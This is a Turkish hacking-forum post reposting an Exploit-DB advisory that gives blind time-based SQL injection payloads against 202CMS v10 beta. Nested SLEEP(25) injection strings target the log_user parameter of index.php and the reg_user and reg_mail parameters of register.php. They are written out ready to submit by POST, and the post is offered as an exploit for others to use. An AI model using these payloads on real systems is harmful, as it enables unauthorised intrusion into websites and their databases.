İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

202CMS v10beta - Multiple SQL Injection

21-03-2019 02:31
#1
deargod - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
vice city
Mesajlar:
167
Teşekkür (Etti):
20
Teşekkür (Aldı):
36
Konular:
15
Ticaret:
(0) %
# Exploit Title/Exploit Başlığı: 202CMS - 'log_user' SQL Inj.
# Dork: N/A
# Date/Tarih: 20-03-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sayfası: https://sourceforge.net/projects/b202cms/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/b202cms/
# Version/Versiyon: v10 beta
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: Wamp64, Windows
# CVE: N/A
# Software Description/Yazılım Açıklaması: 202CMS küçük ama çok işlevli bir içerik yönetim sistemidir.Twitter Boostrap bu içerik yönetim sistemine dayanmaktadır.
Bu CMS Kondrad tarafından yazılmış olup , MySQLi ve PHP ile güçlendirilmiştir.202CMS oldukça düzenlenebilir bir yapıya sahip aynı zamanda oldukça basit bir kurulumu mevcuttur.
Bu script henüz tamamlanmadı, ama çok yakında tamamlanacaktır.

================================================== =========================================
# POC - SQLi (blind)
# Parameters : log_user
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27 XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c %22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22 *%2f
# POST Method : http://localhost/202cms10beta/index.php

================================================== =========================================

################################################## #########################################
================================================== =========================================

# Exploit Title/Exploit Başlığı: 202CMS - 'register.php' SQL Inj.
# Dork: N/A
# Date/Tarih: 20-03-2019
# Exploit Author/Exploit Yazarı: Mehmet EMIROGLU
# Vendor Homepage/Yapımcı Sayfası: https://sourceforge.net/projects/b202cms/
# Software Link/Yazılım Linki: https://sourceforge.net/projects/b202cms/
# Version/Versiyon: v10 beta
# Category/Kategori: Webapps
# Tested on/Test Edilen Platform: Wamp64, Windows
# CVE: N/A
# Software Description/Yazılım Açıklaması: 202CMS küçük ama çok işlevli bir içerik yönetim sistemidir.Twitter Boostrap bu içerik yönetim sistemine dayanmaktadır.
Bu CMS Kondrad tarafından yazılmış olup , MySQLi ve PHP ile güçlendirilmiştir.202CMS oldukça düzenlenebilir bir yapıya sahip aynı zamanda oldukça basit bir kurulumu mevcuttur.
Bu script henüz tamamlanmadı, ama çok yakında tamamlanacaktır.


================================================== =========================================
# POC - SQLi (blind)
# Parameters : register.php, reg_user,reg_mail
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27 XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c %22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22 *%2f
# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
# POST Method : http://localhost/202cms10beta/register.php

================================================== =========================================

# Exploit Adresi : https://www.exploit-db.com/exploits/46579
Kullanıcı İmzası
"Ulusal egemenlik öyle bir nurdur ki, onun karşısında zincirler erir, taç ve tahtlar yanar, mahvolur."
Mustafa Kemal ATATÜRK

telegram: deargod_tht
Rainshy, LLegenDD, p0inne Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı